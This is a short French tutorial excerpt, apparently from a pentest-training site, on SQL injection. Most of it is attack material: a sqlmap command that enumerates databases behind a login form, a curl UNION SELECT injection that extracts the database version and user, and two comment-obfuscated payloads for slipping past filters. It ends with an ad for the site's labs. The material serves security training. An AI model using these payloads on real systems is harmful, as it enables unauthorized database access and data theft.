Equipe LabsCyber · Avril 2026 · 8 min
Les injections SQL representent 19% des vulnerabilites critiques detectees lors des pentests.
sqlmap -u "http://target.com/login.php" --data="username=admin&password=test" --dbs --batch
Determiner le nombre de colonnes, identifier les colonnes affichables, puis extraire les donnees.
curl "http://target.com/product.php?id=1 UNION SELECT 1,version(),user(),4,5--"
/*!50000UNION*/ SELECT 1,2,3--
/**/UNION/**/SELECT/**/1,2,3--
Maitrisez l'injection SQL avec une approche methodique. Pratiquez sur LabsCyber.fr avec nos labs interactifs.
9 labs gratuits · Sans carte bancaire
Commencer gratuitement